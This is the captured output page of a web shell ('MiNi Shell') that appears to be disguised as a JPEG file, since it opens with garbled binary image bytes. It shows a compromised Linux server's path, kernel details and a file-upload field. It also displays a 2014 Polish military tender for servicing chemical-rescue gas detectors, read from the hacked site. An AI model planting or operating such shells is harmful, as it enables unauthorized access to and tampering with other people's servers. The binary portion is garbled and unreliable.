JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140205/22953-N-2014.html

<p class="kh_header"><b>Grudziądz: Naprawa, serwisowanie i kalibracja sprzętu Zespołu Ratownictwa Chemicznego i pododdziałów jednostki JW 3537 - Sprawa Nr 1/2014</b><br>
<b>Numer ogłoszenia: 22953 - 2014; data zamieszczenia: 05.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 13 Wojskowy Oddział Gospodarczy (Jednostka Wojskowa 4503 ) , ul. Czwartaków 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 458 32 90, 458 32 00, faks 56 458 32 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.13wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sektora finansów publicznych - wojsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa, serwisowanie i kalibracja sprzętu Zespołu Ratownictwa Chemicznego i pododdziałów jednostki JW 3537 - Sprawa Nr 1/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie usług naprawy, serwisowania i kalibracji sprzętu dla Jednostki Wojskowej 3537 w Brodnicy, według zadań następująco:
1)ZADANIE NR 1: Serwisowanie i kalibracja sprzętu wykrywającego gazy.
Serwisowaniu będą podlegały następujące typy urządzeń:
Lp.,Przedmiot zamówienia, Ilość usług w trakcie trwania umowy, Ilość urządzeń [szt.], Termin realizacji [m-c]w 2014.
1. Sygnalizator Bezruchu Firefly II - Serwis okresowy, 1, 10, wrzesień
2. Detektor Jednogazowy Toxi Vision E
 - Serwis okresowy i kalibracja, 2, 1, maj, listopad;
3. Detektor Jednogazowy Toxi Pro 02
 - Serwis okresowy i kalibracja, 2, 1, maj, listopad;
4. Detektor Jednogazowy Toxi Pro Co 
 - Serwis okresowy i kalibracja, 2, 1, maj, listopad;
5. Detektor Jednogazowy Toxi Pro H2S 
 - Serwis okresowy i kalibracja, 2, 1, maj, listopad;
6. Detektor Jednogazowy Toxi Pro NH3
 - Serwis okresowy i kalibracja, 2, 1, maj, listopad;
7. Wskaźniki Rurkowe Toximeter II (Walizka)
 - Serwis okresowy, 2, 1, maj, listopad;
8. Wskaźniki Rurkowe Toximeter II (Walizka) 
- Wymiana wskaźników rurkowych QL, 	1, 1, marzec;
9. Wskaźniki Rurkowe Toximeter II (Walizka) 
- Wymiana wskaźników rurkowych PHOSGEN, 1, 1, listopad;
10. Detektor wielogazowy iTX
 - Serwis okresowy i kalibracja, 2, 1, maj, listopad;
11. Miernik GAMMARAE II 
- Serwis okresowy i kalibracja, 2, 1, czerwiec, listopad;
12. Detektor gazów QRAE PLUS
 - Serwis okresowy i kalibracja, 2, 2, kwiecień, październik;
13. Automatyczny sygnalizator skażeń AP-4C 
- Serwis okresowy i kalibracja, 1, 2, maj.
Zakres usług serwisowych w urządzeniach wykrywających gazy:
-inspekcja wizualna,
-inspekcja funkcji,
-ewentualna wymiana sensora,
-wymiana zasilaczy, żarówek żarnikowych, baterii w urządzeniach posiadających je,
-wystawienie świadectw sprawdzenia dla detektorów gazu, 
-kalibracja gazami kalibracyjnymi, 
-diagnostyka czujników,
-serwis okresowy zostanie opisany w książce obsługi technicznej urządzenia,
-wystawienie dokumentu dopuszczającego do pracy w środowisku niebezpiecznym,
-ewentualna wymiana elementów elektronicznych w sygnalizatorach bezruchu,
-wymiana wskaźników rurkowych QL i wskaźników rurkowych PHOSGEN w Toximeter II (w związku z utratą terminu ważności).
Informacja dotyczy: Wskaźników Rurkowych Toximeter II
RURKI KONTROLNE (MSA Auer) DO -TOXIMETER 2- numery katalogowe rurek wskaźnikowych 
NH3-A   NR : D5085755
HCL-A   NR : D5085762
BENZIN-A NR : D5085769
ALKOHOL-A NR : D5085773
CO2-A   NR : D5085758 
HCN-A  NR : D5085756
CKW-A   NR : D5085771
HD,HN  NR : D5086881
H2S-A   NR : D5085764
CK,AC,DP,CG   NR : D5086884
Phosgen-a  NR : D5085761
CO-A  NR : D5085759
Phosphoric Acid Esters NR : D5086880
Dichlormethan-A   NR : D5085772
Nitr-A   NR : D5085760
Alomaten-A NR : D5085770
CL2-A  NR : D5085757
2) ZADANIE NR 2: Serwisowanie pomp.
Serwisowaniu będą podlegały następujące typy urządzeń:
Lp.,Przedmiot zamówienia, Ilość usług w trakcie trwania umowy, Ilość urządzeń [szt.], Termin realizacji [m-c]w 2014.
1. Sygnalizator Bezruchu Firefly II - Serwis okresowy, 1, 1, wrzesień;
2. Detektor Jednogazowy Toxi Vision E
 - Serwis okresowy i kalibracja, 1, 1, wrzesień;
3. Detektor Jednogazowy Toxi Pro 02
 - Serwis okresowy i kalibracja, 1, 13, wrzesień.
Zakres usług serwisowych pomp obejmuje:
-sprawdzenie szczelności,
-dezynfekcję,
-końcową kontrolę dopuszczającą do użytkowania,
-serwis okresowy opisany zostaje w książce obsługi technicznej urządzenia.
3) ZADANIE NR 3: Serwisowanie i naprawa sprężarek.
Serwisowaniu będą podlegały następujące typy urządzeń:
Lp.,Przedmiot zamówienia, Ilość usług w trakcie trwania umowy, Ilość urządzeń [szt.], Termin realizacji [m-c]w 2014.
1. Sygnalizator Bezruchu Firefly II - Serwis okresowy,  1, 1, listopad;
2. Detektor Jednogazowy Toxi Vision E
 - Serwis okresowy i kalibracja, 1, 2 ,listopad;
3. Detektor Jednogazowy Toxi Pro 02
 - Serwis okresowy i kalibracja, 1, 1, listopad.
Zakres usług serwisowych sprężarek i rampy panel do ładowania butli obejmuje:
W sprężarkach powietrznych:
- wymiana oleju, wymiana wkładu filtra powietrza, sprawdzenie jakości powietrza,
- regulacja i regeneracja zaworów,
- badanie stanu technicznego,
- wystawienie dokumentu dopuszczającego do pracy w środowisku niebezpiecznym,
- serwis okresowy opisany zostaje w książce obsługi technicznej urządzenia.
W rampie panel:
- badanie stanu technicznego,
- ewentualna naprawa (wymiana) zaworów i sprawdzenie stanu technicznego,
- wystawienie dokumentu dopuszczającego do pracy w środowisku niebezpiecznym,
- serwis okresowy opisany zostaje w książce obsługi technicznej urządzenia.
Informacja dotyczy: Sprężarki IC-200 Posejdon:
Sprężarka IC - 200 jest sprężarką wysokociśnieniową
W sprężarce IC- 200 Posejdon filtry mają następujące numery katalogowe: 
-oryginalna kaseta filtra wlotowego - 0700(PM165)
-filtr pośredni - W6-2875
-filtr wlotowy - W-13758
-filtr - P(PFU) 201-7
4) ZADANIE NR 4: Serwisowanie sprzętu specjalistycznego.
Serwisowaniu będą podlegały następujące typy urządzeń:
Lp.,Przedmiot zamówienia, Ilość usług w trakcie trwania umowy, Ilość urządzeń [szt.], Termin realizacji [m-c]w 2014.
1. Zestaw do uszczelniania zbiorników HLS - 2
 - Serwis okresowy, 1, 1, wrzesień;
2. Zestaw korków uszczelniających OLS 
- Serwis okresowy, 1, 1, wrzesień;
3. Sterownik pneumatyczny SCV 3U
- Serwis okresowy, 1, 1, wrzesień;
4. Sterownik pneumatyczny SCV 10U
- Serwis okresowy, 1, 1, wrzesień;
5. Reduktor ciśnieniowy PRV 823U
 - Serwis okresowy, 1, 1, wrzesień.
Zakres usług serwisowych w powyższych urządzeniach obejmuje: 
-sprawdzenie szczelności urządzeń pneumatycznych; 
-dopuszczenie do użytku;
-wystawienie dokumentu dopuszczającego do pracy w środowisku niebezpiecznym.
5)ZADANIE NR 5: Serwisowanie Latarki VULCAN typ Ex. 
Lp.,Przedmiot zamówienia, Ilość usług w trakcie trwania umowy, Ilość urządzeń [szt.], Termin realizacji [m-c]w 2014.
1. Latarka Vulcan typ EX
 - Serwis okresowy, 1, 13, wrzesień.
Zakres usług serwisowych w powyższym sprzęcie będzie obejmował:
-w latarkach, w zależności od stopnia zużycia wymiana baterii i żarówek,
-wystawienie świadectw sprawdzenia dla latarek elektrycznych, dopuszczającego do ich wykorzystania w strefie narażonej na wybuch oparów cieczy niebezpiecznych.
6) ZADANIE NR 6: Serwisowanie Automatycznego sygnalizatora skażeń AP-4C.
Lp.,Przedmiot zamówienia, Ilość usług w trakcie trwania umowy Ilość urządzeń [szt.], Termin realizacji [m-c]w 2014.
1. Automatyczny sygnalizator skażeń AP-4C
 - Serwis okresowy, 1, 2, maj.
Zakres usług serwisowych w powyższym sprzęcie będzie obejmował:
-inspekcja wizualna,
-inspekcja funkcji,
-serwis okresowy, który zostanie opisany w książce obsługi technicznej urządzenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.41.31.00-4, 50.51.10.00-0, 50.53.13.00-9, 50.51.41.00-2, 50.61.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 2 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 4 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia na zasadzie spełnia lub nie spełnia wymaganych warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wraz z ofertą winien przedłożyć:
Formularz ofertowy;
Oświadczenie o spełnieniu warunków udziału;
Wykaz części zamówienia, które Wykonawca powierza do realizacji podwykonawcy;
Informacja o Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 Ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego w zakresie:
1) podwykonawcy uczestniczącego w realizacji umowy w wypadku jeżeli Wykonawca określi go co do tożsamości w ofercie,
2) terminu wykonania usługi, po uprzednim zgłoszeniu przez Zamawiającego w terminie do 14 dni przed planowaną usługą,
3) zmiany urzędowej stawki podatku VAT.
Zmiana jak powyżej wymaga zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.13wog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> z kasy JW 4503 ul. Czwartaków 1, 86-300 Grudziądz:4,00 zł, na wniosek Wykonawcy -wysyłka: 8,63 zł lub bezpłatnie z www.13wog.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2014 godzina 09:30, miejsce: Kancelaria JW 4503 ul.Czwartaków 1, 86-300 Grudziądz (pom.7 bud. 1) - osobiście lub przesyłka, wykonawca uwzględnia czas niezbędny na dostarczenie oferty bezpośrednio do kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kopertę należy opisać hasłem: 
OFERTA: Naprawa, serwisowanie i kalibracja sprzętu Zespołu Ratownictwa Chemicznego i pododdziałów jednostki JW 3537 (Sprawa Nr 1/2014) 
Nie otwierać do dnia 18.02.2014 r. do godziny 10:00.
Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi). Konsekwencje złożenia oferty niezgodnie z opisem (np. potraktowanie oferty jako zwykłej korespondencji i niedostarczenie jej na miejsce składania ofert w terminie) ponosi Wykonawca. Wykonawca dla zachowania terminu składania ofert winien uwzględnić czas niezbędny na wystawienie przez osobę pełniącą służbę w biurze przepustek, przepustki upoważniającej do wejścia do kancelarii Zamawiającego oraz czas niezbędny na przejście do kancelarii i złożenie oferty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com